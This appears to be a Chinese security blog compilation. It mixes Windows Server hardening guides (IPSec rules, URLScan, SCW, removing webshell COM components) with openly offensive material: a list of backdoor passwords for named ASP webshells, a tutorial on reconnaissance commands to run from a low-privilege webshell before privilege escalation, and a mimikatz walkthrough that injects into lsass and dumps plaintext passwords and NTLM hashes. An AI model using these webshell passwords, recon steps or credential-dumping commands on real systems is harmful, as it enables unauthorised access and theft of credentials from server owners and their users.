常用远程控制软件收集整理

以下是素包子童鞋收集整理的远程控制软件,各位搞安全的童鞋可以逐个了解,等再遇到类似软件的时候能很好的清楚其特征,在安全入侵防范和后门清理中应该会有事半功倍的效果.

向日葵

logmein (竟然是上市公司)

TeamViewer

各种VNC

gotoassist

live mesh
softether 反向的VPN
logmein旗下的hamachi 反向VPN

这里有几十个老外的远程控制软件列表。

http://en.wikipedia.org/wiki/Comparison_of_remote_desktop_software

不能主动回连的:

remote anywhere

radmin

damware

netop 貌似还能搞网络会议

pcanywhere

Advertisements

IPSEC安全策略之禁用协议(详细总结图文)

网络安全问题日益严重,不管是在internet,还是在企业内部网络中,这些问题的出现都由于缺乏完善的安全性设计考虑,因为公用网络和内部网络 对于未 授权的监示和访问都是十分敏感的。敏感的数据总在不断地穿行在网络上,仅有基于用户名和密码的保护是不能保护网络上传输的数据,所以网络管理员的重要职责 就是确保数据的安全性。
现网络上常见的网络攻击的常见类型有:
窃听
数据修改
标识伪造(IP 地址伪造)
基于密码的攻击
“拒绝服务”攻击
中间人攻击
泄露密钥攻击
探测器攻击
应用程序层攻击
由于应用程序的多样性,网络上各种应用程序、操作系统都不可避免的存在安全漏洞。windows server 2003使用了内置的安全组件支持公共的安全标准来保证数据传输的安全性,就是IPSec.
关于IPSec的相关概念,我们从:http://www.microsoft.com/china/t … ipsec/ipsecapa.mspx 这里了解。
我们关注的是IPSec能做什么?
我们从这几方面去讨论:
1.禁用协议。
2.关闭端口
3.加密数据
4.身份验证

一.验证禁用协议
环境:2台工作组的机器,可以是2000,xp 2003.
拓朴:

ipsec安全策略基于ICMP的功击非常多,像现时很多国内大形的站点都不允许使用ping了。
我们用IPSec技术看如何禁用ICMP(ping 基于ICMP协议)?
当前环境:

IPSEC安全策略

IPSEC安全策略

通过运行,打开MMC管理控制台,添加管理单元,选择添加IP安全策略管理。

IPSEC安全策略

管理本地IPSec。这时会发现3条内置的IPSec策略。
我通过新建策略来实施,方便我们学习。
注意:任何时刻只能有一条策略在使用,而一条策略可包所多个IP筛选器规则。
1.下面建立一策略。
要做的就是让lab2不能ping通lab1.

IPSEC安全策略

欢迎向导,下一步,策略名称。

IPSEC安全策略

不激活默认响应规则。IPSEC安全策略

完成向导,策略建立完毕,编辑策略。
一条策略可包含多条IP筛选规则。

IPSEC安全策略

2.建立IP筛选规则,去掉使用添加向导,添加IP筛选器。

IPSEC安全策略

A.我不使用原有的筛选器列表,新建一个IP筛选器规则。

ipsec安全策略

设置IP筛选器列表,地址,协议。
因我是不允许别人ping我,所以设置如下:
打上镜像钩的作用是,也不允许我ping别人(下面再验证)。

IPSEC安全策略

ipsec安全策略

B.确定之后,IP筛选器设置完毕,接下来设置针对这个筛选器的操作。

IPSEC安全策略

见到3个内置的操作,我使用我新建的,去掉向导。

IPSEC安全策略

建立筛选器操作。

IPSEC安全策略

IPSEC安全策略

选择建立好的筛选器操作。IPSEC安全策略

C.因使用了阻止,没有协商,就没有身份验证,不指定隧道,连接类型选择所有网络

IPSEC安全策略

IPSEC安全策略

IPSEC安全策略

确定后,一条规则设置完毕。
小结:
一条规则包括要设置的地方有如图,有5个,而且每一个设置里面又有添加向导,这是让使用者觉得难的地方。

IPSEC安全策略

3.指派策略。IPSec策略指派后生效非常快,可以立刻见结果。

IPSEC安全策略

IPSEC安全策略

 

还有一点要注意的是,我做的策略是不允许任何人ping我,我能ping别人吗?
因为ping,是发送4个包,结果是别人返回4个包给我的,发送的包能出去,但回不来了,由策略设置不允许回来。所以看看,lab1上ping lab2。

如果在规则中打上镜像的钩,包是不允许出去了。
结果:

IPSEC安全策略

以上实验就是演示IPSEC策略禁止其它电脑ping 服务器,能很好的防范部分黑客软件对服务器的威胁。因为很多黑客扫描软件扫描之前都是先ping服务器看看是不是能PING通,只有能 ping通之后才继续下一步扫描开放哪些端口。我们也可以按照以上的操作禁止部分端口的通信。

windows server 2003服务器防黑客入侵总结

我们将从入侵者入侵的各个环节来作出对应措施,一步步的加固windows系统。

加固windows系统.一共归于几个方面
1.端口限制
2.设置ACL权限
3.关闭服务或组件
4.包过滤
5.审计

我们现在开始从入侵者的第一步开始.对应的开始加固已有的windows系统.

1.扫描
这是入侵者在刚开始要做的第一步.比如搜索有漏洞的服务.
对应措施:端口限制
以下所有规则.都需要选择镜像,否则会导致无法连接
我们需要作的就是打开服务所需要的端口.而将其他的端口一律屏蔽

2.下载信息
这里主要是通过URL SCAN.来过滤一些非法请求
对应措施:过滤相应包
我们通过安全URL SCAN并且设置urlscan.ini中的DenyExtensions字段
来阻止特定结尾的文件的执行

3.上传文件
入侵者通过这步上传WEBSHELL,提权软件,运行cmd指令等等.
对应措施:取消相应服务和功能,设置ACL权限
如果有条件可以不使用FSO的.
通过 regsvr32 /u c:\windows\system32\scrrun.dll来注销掉相关的DLL.
如果需要使用.
那就为每个站点建立一个user用户
对每个站点相应的目录.只给这个用户读,写,执行权限,给administrators全部权限
安装杀毒软件.实时杀除上传上来的恶意代码.
个人推荐MCAFEE或者卡巴斯基
如果使用MCAFEE.对WINDOWS目录所有添加与修改文件的行为进行阻止.

4.WebShell
入侵者上传文件后.需要利用WebShell来执行可执行程序.或者利用WebShell进行更加方便的文件操作.
对应措施:取消相应服务和功能
一般WebShell用到以下组件
W.Network
W.Network.1
W.Shell
W.Shell.1
Shell.Application
Shell.Application.1
我们在注册表中将以上键值改名或删除
同时需要注意按照这些键值下的CLSID键的内容
从/HKEY_CLASSES_ROOT/CLSID下面对应的键值删除

5.执行SHELL
入侵者获得shell来执行更多指令
对应措施:设置ACL权限
windows的命令行控制台位于\WINDOWS\SYSTEM32\CMD.EXE
我们将此文件的ACL修改为
某个特定管理员帐户(比如administrator)拥有全部权限.
其他用户.包括system用户,administrators组等等.一律无权限访问此文件.

6.利用已有用户或添加用户
入侵者通过利用修改已有用户或者添加windows正式用户.向获取管理员权限迈进
对应措施:设置ACL权限.修改用户
将除管理员外所有用户的终端访问权限去掉.
限制CMD.EXE的访问权限.
限制SQL SERVER内的XP_CMDSHELL

7.登陆图形终端
入侵者登陆TERMINAL SERVER或者RADMIN等等图形终端,
获取许多图形程序的运行权限.由于WINDOWS系统下绝大部分应用程序都是GUI的.
所以这步是每个入侵WINDOWS的入侵者都希望获得的
对应措施:端口限制
入侵者可能利用3389或者其他的木马之类的获取对于图形界面的访问.
我们在第一步的端口限制中.对所有从内到外的访问一律屏蔽也就是为了防止反弹木马.
所以在端口限制中.由本地访问外部网络的端口越少越好.
如果不是作为MAIL SERVER.可以不用加任何由内向外的端口.
阻断所有的反弹木马.

8.擦除脚印
入侵者在获得了一台机器的完全管理员权限后
就是擦除脚印来隐藏自身.
对应措施:审计
首先我们要确定在windows日志中打开足够的审计项目.
如果审计项目不足.入侵者甚至都无需去删除windows事件.
其次我们可以用自己的cmd.exe以及net.exe来替换系统自带的.
将运行的指令保存下来.了解入侵者的行动.
对于windows日志
我们可以通过将日志发送到远程日志服务器的方式来保证记录的完整性.
evtsys工具(https://engineering.purdue.edu/ECN/Resources/Documents)
提供将windows日志转换成syslog格式并且发送到远程服务器上的功能.
使用此用具.并且在远程服务器上开放syslogd,如果远程服务器是windows系统.
推荐使用kiwi syslog deamon.

我们要达到的目的就是
不让入侵者扫描到主机弱点
即使扫描到了也不能上传文件
即使上传文件了不能操作其他目录的文件
即使操作了其他目录的文件也不能执行shell
即使执行了shell也不能添加用户
即使添加用户了也不能登陆图形终端
即使登陆了图形终端.拥有系统控制权.他的所作所为还是会被记录下来.

额外措施:
我们可以通过增加一些设备和措施来进一步加强系统安全性.
1.代理型防火墙.如ISA2004
代理型防火墙可以对进出的包进行内容过滤.
设置对HTTP REQUEST内的request string或者form内容进行过滤
将SELECT.DROP.DELETE.INSERT等都过滤掉.
因为这些关键词在客户提交的表单或者内容中是不可能出现的.
过滤了以后可以说从根本杜绝了SQL 注入
2.用SNORT建立IDS
用另一台服务器建立个SNORT.
对于所有进出服务器的包都进行分析和记录
特别是FTP上传的指令以及HTTP对ASP文件的请求
可以特别关注一下.

本文提到的部分软件在提供下载的RAR中包含
包括COM命令行执行记录
URLSCAN 2.5以及配置好的配置文件
IPSEC导出的端口规则
evtsys
一些注册表加固的注册表项.

Sql注入漏洞的形成和防范

随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代 码的时 候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就 是所谓的SQL Injection,即SQL注入。

Sql注入是当前web脚本安全中比较常见的漏洞,下面为大家分享一个电子书.Sql注入漏洞全接触,全面介绍了Sql注入的原理,Sql注入漏洞的一般利用步骤和防范方法.

sql注入漏洞全接触下载地址:

http://www.nxadmin.com/tools/sql-injection.pdf

Win2003安全加固之SCW

千呼万唤始出来,近日微软终于发布Windows Server 2003中文补丁包SP1。它除了对系统中存在的漏洞进行修补外,还新增了一些实用功能,特别是安全配置向导(Security Configuration Wizard,简称SCW)功能,它成为Windows 2003 SP1新增功能中的亮点。

在Windows 2003 SP1系统中,安全配置向导(SCW)是一个新增的安全配置功能,它可以最大程度地缩小服务器的受攻击面。

利用SCW所提供的功能,网管能非常轻松地完成服务器角色的指定,禁用不需要的服务和端口,配置服务器的网络安全,配置审核策略、注册表和IIS服 务 器等工作,对巩固服务器的安全有极大的帮助。同时,由于整个配置过程都是在向导对话框中完成的,无需繁琐的手工设置,网管的工作负担会得到减轻。

现在,不妨让我们在这位安全“向导”的指引下,去巩固我们的服务器安全防护体系。

默认情况下,即使你的Windows 2003系统已安装了SP1补丁包,但这时还是无法使用SCW功能的。这是因为该组件没有被安装,用户需要通过“添加/删除Windows组件”功能手工安装SCW。

首先保证Windows 2003系统已经安装了SP1补丁包,接着进入“添加/删除Windows组件”页面。在“Windows组件向导”对话框中选中“安全配置向导”选项,点击“下一步”按钮后,就能轻松完成SCW组件的安装。

提示:完成该组件的安装后,运行SCW也很简单,主要有两种方法。进入“控制面板”中的“管理工具”窗口,运行“安全配置向导”即可;点击“开始→运行”,在运行对话框中运行“SCW.exe”命令。

“万事俱备,只欠东风”,完成了“安全配置向导”组件的安装后。大家可利用SCW安全配置向导,一步步的对Windows 2003服务器的角色服务、网络安全、注册表、审核策略,以及IIS服务器进行配置,实现增强服务器安全的目的。

运行SCW后,弹出“欢迎使用安全配置向导”对话框,点击“下一步”按钮,进入“配置操作”对话框。

由于是第一次运行SCW功能,因此在“配置操作”对话框中要选择“创建新的安全策略”。

win2003安全加固

1.选择服务器

俗话说“有的放矢”,在进行安全配置之前,首先要选择目标,也就是选择将要进行安全配置的Windows 2003服务器。

点击“下一步”按钮后,进入“选择服务器”对话框。在这里选择要进行安全配置的Windows 2003服务器(可以是本地服务器,也可是网络中的其他服务器)。在“服务器”栏中输入要进行安全配置的Windows 2003服务器的机器名或IP地址。接着点击“下一步”按钮,SCW就开始处理安全配置数据库。完成后,进入“基于角色的服务配置”对话框,才真正开始 SCW向导化的安全配置之旅。

2.我的“角色”,我做主

Windows 2003服务器提供了数量众多的服务器角色,如文件服务器、DHCP服务器等,但并不是所有的角色都是需要的。使用不慎,反而会增加服务器的安全隐患。利用SCW的“选择服务器角色”向导就能轻松完成角色的选择。

在“基于角色的服务配置”向导中可以对Windows 2003服务器角色、客户端功能、系统服务等内容进行配置。点击“下一步”按钮,进入“选择服务器角色”对话框(图1),在列表框中选择Windows 2003服务器所执行的角色(如文件服务器、打印服务器等)。根据自己的需要,在角色列表框中勾选需要的服务器角色选项后,才能使用相应的Windows 2003服务器功能并开放相应的服务端口。

当然,一个Windows 2003服务器可以担当一个或多个服务器角色,它可以是Web服务器,也可以是文件服务器。

点击“下一步”后,选择Windows 2003服务器的“客户端功能”。设置Windows 2003系统作为客户端所要扮演的角色(如Microsoft网络客户端、FTP客户端等),在列表框中勾选所需要的客户端功能即可。点击 “下一步”后,进入“选择管理和其它选项”对话框,选择所需要的Windows 2003服务。

下面还要配置Windows 2003系统的额外服务,配置完成后进入“处理未指定的服务”对话框。“未指定的服务”是指没有在安全配置数据库中列出的服务(如杀毒软件提供的服务)。建议大家选中“不更改此服务的启用模式”选项,这样该服务会按照以前的状态运行。

最后进入“确认服务更改”对话框,对以上所做的配置进行最终确认后,这样就完成了基于角色的服务配置。

3.开放端口,要注意网络安全

完成基于角色的服务配置后,各种服务器要在网络中为用户提供服务,就必须开放相应的服务端口。默认情况下,Windows防火墙是不允许这些服务端口通信的。因此,我们可以在SCW向导中开放通信端口。

进入“网络安全”对话框,在此可配置已经选中的服务器角色和其他Windows 2003服务所使用的端口。点击“下一步”按钮后,在“打开端口并允许应用程序”对话框中开放需要的端口(图2)。如FTP服务器需要的“20和21”端 口,IIS服务需要的“80”端口等。只要在列表框中选择要开放的端口选项即可,最后确认端口配置。

win2003安全加固

4.修改注册表,增强服务器安全

很多网管利用修改注册表和组策略的方法增强服务器安全,但这种方法存在很大的风险性,错误修改了某个键值或安全策略,会导致服务器出现问题。利用SCW的注册表设置向导进行修改,既省事,又安全。

完成以上网络安全设置后,就进入到注册表设置向导对话框,利用设置向导来修改某些特殊的注册表键值,增强服务器安全。根据注册表设置向导的提示,分别完成对“出站身份验证方法”、“入站身份验证方法”等项目的设置即可。

5.配置审核策略,用好日志

Windows 2003服务器的日志就像一个“黑匣子”,可以记录系统中发生的一切,为服务器的稳定运行提供帮助。但记录太多的事件会浪费服务器资源,因此网管可以合理地选择审核目标,记录一些重要事件。

SCW提供了系统审核策略配置功能,免去了手工指定审核目标的麻烦。

进入“系统审核策略”配置对话框后,合理选择审核目标即可。建议大家选择“审核成功的操作”选项,这样一来,日志只记录成功的事件操作,而其他则会被忽略,节省了服务器资源。

当然,如果有特殊需要,也可以选择其他选项。如“不审核”或“审核成功或不成功的操作”选项。

6.IIS安全,要慎重

IIS服务器的脆弱性大家都知道,这次微软对IIS非常重视,在SCW中提供了“Internet信息服务”配置功能。

如果你的系统中已安装、运行了IIS服务器,完成了系统审核策略配置后,SCW就会对IIS服务进行安全配置,保证它能稳定运行。

进入“Internet信息服务”配置向导对话框后,按照提示和服务器的需要,分别设置IIS要启用的Web服务扩展、要保留的虚拟目录,以及设置匿名用户是否有写权限。以上设置过程比较简单,根据实际需要,启用所要的IIS项目即可。

完成以上配置后,还要保存配置的安全策略。在“安全策略文件名”对话框中,为配置的安全策略取名,最后在“应用安全策略”对话框中选择“现在应用”选项,使配置的安全策略生效。

现在,经过上述设置之后,Windows 2003服务器会变得更加安全、可靠,能够最大限度地抵御病毒和黑客的攻击。同时,使用SCW功能对Windows 2003系统进行安全方面的配置,非常简单,易于上手,极大地降低了网管的安全维护工作量。如果SP1补丁包已在你的Windows 2003系统中安家落户,不妨立刻试试SCW的神奇功效。

IPSEC安全策略之关闭端口

验证:禁用lab1远程访问3389端口。
环境:

IPSEC安全策略

1.新建策略,或使用原有策略。IPSEC安全策略

2.建立IPSec筛选器规则。

ipsec安全策略

ipsec安全策略

IPSEC安全策略

操作,身份验证,隧道,网络类型。
直接使用已有的deny操作。

IPSEC安全策略

IPSEC安全策略

IPSEC安全策略

IPSEC安全策略

规则建立完成,还有指派的步骤,在没指派前,看到,lab2是可登录的。

IPSEC安全策略
3.指派策略。

IPSEC安全策略

结果

IPSEC安全策略

以上实验演示了如何运用IPSEC安全策略禁用服务器系统的部分端口。服务器一般有很多端口实际是没有必要开的,我们可以通过运用IPSEC安全策略禁用一些比较具有安全威胁的系统端口,这样能很好的降低系统被入侵的可能。

组策略高手完全手册(视频教程)

组策略是活动目 录里的重要组成部分,也是活动目录里的重点内容。了解和使 用组策略将最大限度的使你的管理工作变得简单化、条理化。你想了解更多的组策略知识,并希望成为组策略的高手吗?本系列课程将就组策略的概念、实现、管 理、维护以及使用GPMC(组策略管理工具)来对组策略进行备份、恢复等进行讲解,并结合组策略的实际应用深入了解组策略这个管理用户和计算机的利器。帮 助大家从了解组策略到熟练使用组策略的入门到进阶的学习。

系列课程列表

入门篇
入门篇中,我们将首先了解组策略的概念,知道什么是组策略?组策略能做什么?我们为什么要使用组策略?通过这部分课程的学习,我们主要要认识组策略并知道组策略的常规使用方法,知道如何对组策略进行建立、编辑和应用的基础知识。

讲师信息: 王辉 微软金牌认证讲师 苏州索迪培训中心
2005-12-16 10:00-11:30
什么是组策略?组策略能做什么?本讲将简要介绍组策略的概念,组策略的构成和专用术语。了解组策略的功能介绍和主要应用场景,初步认识组策略的设置内容和组成结构的基础知识。

组策略高手完全手册入门篇之一:组策略介绍和功能概览.rar
讲师信息: 张华 微软金牌认证讲师 微软护航技术专家
2005-12-19 10:00-11:30
讲述如何建立组策略对象和组策略链接,如何对组策略对象进行编辑,如果将组策略对象链接到对应的OU或域上,以及如何使用组策略编辑器来编辑设置组策略。并引导听众了解组策略的简单处理规则。

组策略高手完全手册入门篇之二:创建、编辑和应用组策略.rar

讲师信息: 王辉 微软金牌认证讲师 苏州索迪培训中心
2005-12-21 14:00-15:30
你需要部署软件吗?你是否为烦琐的大批量部署软件而犯愁? 你希望用户可以自己选择软件安装而不需要安装介质吗?你希望强制为用户或计算机安装指定的软件吗?通过组策略可以快速方便的完成软件的部署和分发工作。

组策略高手完全手册入门篇之三:使用组策略管理软件分发.zip

讲师信息: 赵翔 讲师 北京中达金桥科技服务公司
2005-12-23 10:00-11:30
你的企业里用户喜欢使用奇怪的桌面吗?你的用户经常修改计算机的设置吗?如何让用户的误操作导致的网络问题降低到最少?用户的我的文档经常在重新安装系统 后才发现没有备份。这是管理员非常关注的问题,通过本讲的学习,我们将使用组策略的强大能力,有效的管理用户的环境,包括网络设置、浏览器设置、桌面、屏 保等,并可以完成用户脚本的分发、文件夹重定向等高级功能。

组策略高手完全手册入门篇之四:使用组策略管理用户环境.zip
学好组策略的配置使用,在系统安全加固方面能起到事半功倍的效果。相信看完以上视频教程,大家会对组策略充满学习的热情。

社工秘笈:常见的黑客后门网马密码收集

组超强功能修正去后门加强S-U提权版                密码hkk007

火狐asp木马(超强版)” 华夏五周年庆典版             密码wrsk

**(中国数据)                              密码rinima

asp    黑客→kissy                                                      密码ceshi2009

Evil sadness                                                              密码5201314

F.S.T 联盟交流群内部版.!别外传噢                         密码rfkl

username                                                                   密码847381979

这是一个没有信仰的年代-.-                                        密码jing

伟                                                                                   密码winner

沙漠之烟 密码4816535

去演绎神话吧’ 密码zhack

Sam,asp大马修正加强版 qq:42466841 密码mama520

fuck you 密码123go

小武来了 密码1

Baiki-” 密码1

Login 密码888999

E.V.A.V 专 用 网 马『修改版』密码13572468

月满西楼 密码sasa
蛋蛋WEBSHELL鼠年增强版 密码dangdang

乄缘來④妳专版免杀asp大马 密码lovehack7758

F.S.T 联盟交流群内部版.!别外传噢 密码rfkl

暗组超强功能修正去后门加强S-U提权版 密码123
80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp hkmm
G.xp 专用 密码133135136
Satan 密码1992724

F.S.T 联盟交流群内部版!!!别外传噢!!! 密码yong
Evil sadness 密码noid

懂你味道 密码caodan
黑鹰专用WEBSHELL 密码96315001
思易免杀asp木马3.0(最新两款) 密码admin
TX-网络专用asp木马 密码axiao
username 密码847381979
F.S.T 联盟交流群内部版.!别外传噢。” 密码rfkl
GHOST永久免杀asp木马 ghost 密码yuemo
围剿专版 +口令 密码yuemo

Miracle个人专用 密码12
小武来了 密码535039
唐宋元明清╯” 密码bzxyd
安全检测 {BY:網丄邻居} |” 密码tonecan
我要进去’ 密码bzxyd

Evil sadness 密码5201314
3E Security Team 密码3est
败家简单前后门 密码sin
F.S.T 海盗内部版.!别外传噢。by 海盗 密码654321
蓝色灭杀 密码ghost
HqzX 密码C

F.S.T 联盟交流群内部版!!!别外传噢!!!” 密码yong
webadmin2 密码webadmin
HqzX’s Blog 密码

login蓝色 密码5909062xzx

红盟太子 iolhcw19891209

windows系统提权基础小命令总结

作者:NP     老文章转载

我们来谈下提权前的,(WIN系统)服务器内部信息探测!(因为现在机器基本上都是2K3以上了,所以我们的话题主要围绕2K3谈)我们拿到一个低 权限的WEBSHELL后,一般都是先探测服务器内部信息,以找到可以提权的条件或桥梁。(当然,也有一些WEBSHELL上去了就直接是管理员权限,甚 至是SYSTEM权限,但是这个已经不在我这个话题的讨论范围了。)
因为不知道大家是如何探测目标服务器的总体环境的,所以我这边就全当讲给新手朋友听的,老鸟略过。什么叫服务器的总体环境呢?例如:目标服务器开启的端 口、进程、系统服务,安装了哪些程序,系统安全的大体设置。我们这边谈的探测,基本上都是建立在可以执行基本命令的WEBSHELL上的。(我们的主题本 就是提权前的小命令嘛,咱不能跑题不是^_^)

一、首先,探测端口。
我们一般都用 netstat -an ,这个是在WIN系统上常用命令。但微软在WINXP以后,就加强了此命令。


-b 显示包含于创建每个连接或监听端口的可执行组件。在某些情况下已知可执行组件拥有多个独立组件,并且在这些情况下包含于创建连接或监听端口的组件序列被显 示。这种情况下,可执行组件名以及其调用的组件,等等,直到 TCP/IP 部分。注意此选项可能需要很长时间,如果没有足够权限可能失败。
-o 显示与每个连接相关的所属进程 ID。
-v 与 -b 选项一起使用时将显示包含于为所有可执行组件创建连接或监听端口的组件。

因此2K3上加上这些参数后,我们可以在服务器上获得更多的信息。比如端口所对应的进程名和进程PID、其调用的组件以及相对系统路径。

netstat -anb 的结果如图1所示渗透基础命令

netstat -ano 的结果如图2所示

图2

提权基础命令

而我们为了能获得更详细的信息,一般都会用netstat -anvb 这时,你看到的信息包括 进程名、相对应的进程PID、端口所用的协议、调用的可执行组件、相对的组件和第三方进程的系统路径。

二、其次,进程信息的获取。

tasklist /svc //此命令可以获取每个进程中主持的服务,如图3所示:

 

windows提权

 

这个命令我想,大部分的安全技术爱好者都会。我们再来了解一个命令。
●start /wait msinfo32.exe /report c:\windows\temp\list.txt /categories swenv+SWEnvRunningTasks●运行结果如图4所示。

提权基础DOS命令

msinfo32.exe是什么呢?记得LCX大哥也有介绍过相关的信息(《黑客手册200801》“我在入侵过程中注意到的细节(一)”,
此程序可以显示计算机中的有关系统信息,可用其诊断、解决计算机问题并查看远程系统所生成的系统报告。用此程序的命令行用法可以获得更详细的进程信息。当 然,此命令在低权限的WEBSHELL下,只能看其有权限看的进程信息。不过获取的信息比Tasklist获取的要详细很多。

三、再次,系统服务信息的获取。
由于2K3默认设置限制了WEBSHELL查看“系统服务信息”,所以我们需要配合SC命令来获取我们需要的系统服务相关信息!
首先,我们可以用net start 来获得已经运行的服务,如图5所示。

提权基础命令

通过Tasklist和net start命令获得了相关服务后,我们就要开始找自己感兴趣的服务了。
例如,我们要找SERV-U服务相关的信息,我们可以用以下命令来获取。由于我们从net start命令中获取的系统服务信息显示的是系统服务的“显示名称”而sc的qc参数和query参数,都没办法直接从系统服务的“显示名称”获得信息,如图6所示:

渗透基础命令

于是我们需要用sc的getkeyname参数,先从系统服务的“显示名称”获得其服务名(当然,如果你知道其系统服务名称,就不必要那么麻烦了, 直接查询即可) sc getkeyname “Serv-U FTP Server”  命令执行后的结果如图7所示。获得了系统服务名称后,我们就可以用qc或query查询其相关信息了 如图8、图9所示。

提权基础命令渗透基础DOS命令提权基础DOS命令

我们再次派msinfo32.exe出场!嘿嘿,这个可是好家伙呀,Hacking必备。
●start /wait msinfo32.exe /report c:\windows\temp\service.txt /categories swenv+SWEnvServices●,命令结果,如图10所示:渗透DOS命令

再再次,我们详细了解下如何用msinfo32.exe来获取更多的信息:


Msinfo32.exe 的用法
/? – 显示“帮助”对话框

/msinfo_file=文件名 – 打开指定的 .nfo 或 .cab 文件

/nfo 或 /s 文件名 – 将 .nfo 文件输出到指定的文件

/report 文件名 – 将文本格式的文件输出到指定的文件

/computer 计算机名 – 连接到指定的计算机

/categories (+|-)(all | 类别名) +|-(类别名)…- 显示或输出指定的类别

/category 类别名 – 在启动时将焦点设置到特定类别

由于我们一般只需要获取软件环境信息,所以我们这边就只了解下此程序的软件环境的子类别开关名称
软件环境的子类别
子类别标题  子类别开关
===================================================
驱动程序   SWEnvDrivers
环境变量   SWEnvEnvVars
作业       SWEnvJobs
网络连接   SWEnvNetConn
正在运行任务  SWEnvRunningTasks
加载的模块    SWEnvLoadedModules
服务       SWEnvServices
程序组     SWEnvProgramGroup
启动程序   SWEnvStartupPrograms
OLE 注册   SWEnvOLEReg

示例:
获取环境变量:
●start /wait msinfo32.exe /report c:\windows\temp\Startup.txt /categories swenv+SWEnvEnvVars●
获取程序组信息(可以获取到目标服务器所安装的软件信息):
●start /wait msinfo32.exe /report c:\windows\temp\programs.txt /categories swenv+SWEnvStartupPrograms●
获取启动程序相关信息:
●start /wait msinfo32.exe /report c:\windows\temp\Startup.txt /categories swenv+SWEnvStartupPrograms●

注意:示例中使用了 start /wait 开关,以便从 Cmd.exe 命令提示符处执行批处理文件和/或命令行。要启动 Msinfo32.exe,必须使用 start 开关;如果使用 /wait 开关,则在当前项目完成之前,将不会处理下一个项目。使用 start /wait 开关可以确保计算机不会因为某些 Msinfo32.exe 类别占用大量 CPU 时间而发生过载。

最后,我们顺带一下系统权限配置的查看。很多人都知道cacls命令,只要cacls 然后目录或文件的路径即可,如图11所示。

提权DOS命令

写了那么多,可能一些人都看烦咯,怎么讲的都是基础的命令,不是在浪费我们的时间么?呵呵,太臭的我也不敢写出来,再着我们要照顾新手朋友呀。

 

四、下面我们来做做总结。
为什么要获取服务器的这些总体信息呢?
1.端口信息,可以让我们知道服务器开了哪些端口?哪些端口可以利用?哪些端口对应的服务或程序可以利用?或是对方还开了哪些我们不知道的服务(比如对方又开了一些不常用的端口来运行高权限的WEB服务,如tomcat等)。
比如,SERV-U修改了本地管理端口,我们也可以通过端口和进程信息进行了解。
2.进程信息,可以让我们知道服务器运行了哪些程序,管理员喜欢开什么程序,或正在运行什么程序。有哪些防护(比如杀毒软件,防火墙等信息)
3.系统服务信息,可以让我们了解,哪些服务是运行的,哪些服务可以利用。第三方服务的路径以及启动方式等信息。
如果第三方服务,是装在某些特殊目录,我们可以通过查询系统服务信息获得后,用CACLS命令查询其是否有权限进行修改或写入等操作。若可以写入,或修改,我们就可以替换或修改服务程序来达到提权的目的。
4.系统环境变量,也可以让我们获得一些信息,比如安装了哪些程序,哪些变量我们可以利用。(可以参照我以前写的《谈环境变量在Hacking中的利用》)
5.系统权限的设置的探测,我们可以通过一些疏漏的地方进行利用,以达到提权的目的。

 

服务器中细微的信息,都可能对我们的提权帮助很大。所以我们都不能放过。啰嗦了那么多,不知道大家是否学到了东西呢?如果你有更好的建议和方法。希望能与我分享,我会非常感谢的。欢迎到www.nspcn.org与我讨论交流。

神器mimikatz使用命令方法总结

mimikatz是法国的一位神牛写的神器,该神器有很强大的功能,据说已经被集成在metasplo

1.常规的操作使用命令

mimikatz # cls           –>清屏,类似dos命令cls.

mimikatz # exit         –>退出mimikatz.

mimikatz #version  –>查看当前的mimikatz的版本.

随便输入”xxx::”,会提示”modules:’xxx’ intr0uvable”,大概意思就是你输入的命令不存在,然后会列出所有可用的命令

mimikatz命令

查看列表中命令的具体参数同样可以输入”命令::”来查看,比如:”inject::”,如图:

mimikatz使用方法

可以看到命令inject的具体参数有pid,process,service等……

2.系统方面的操作使用命令:system

mimikatz #system::user   –>查看当前登录的系统用户

mimikazt #system::computer –>返回当前的计算机名称

3.在服务器终端的操作命令: ts

mimikatz #ts::sessions   –>显示当前的会话

mimikatz #ts::processes windows-d.vm.nirvana.local   –>显示服务器的进程和对应的pid情况等。

4.系统服务相关的操作使用命令:service

5.系统进程相关操作的使用命令:process

6.系统线程相关操作使用命令:thread

7.系统句柄相关操作使用命令:handle

8.加密相关操作使用命令:crypto

9.注入操作使用命令:inject

具体的各种神器功能使用有待神人挖掘,表示不会外文压力很大……

分享从lsass抓去系统的明文密码案例:

——————————-邪恶淫荡的分割线————————————————–

mimikatz 1.0 x86 (pre-alpha)    /* Traitement du Kiwi */

mimikatz # privilege::debug

Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll 
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords 
Authentification Id : 0;434898 Package d'authentification : NTLM Utilisateur principal : Gentil User Domaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : password Authentification Id : 0;269806 Package d'authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a }
wdigest : waza1234/ 
tspkg : waza1234/
------------------------------------------邪恶淫荡的分割线-----------------------------------------------------------
作者blog:http://blog.gentilkiwi.com/mimikatz 
本文是本站小编收集总结,转载请注明出处,谢谢……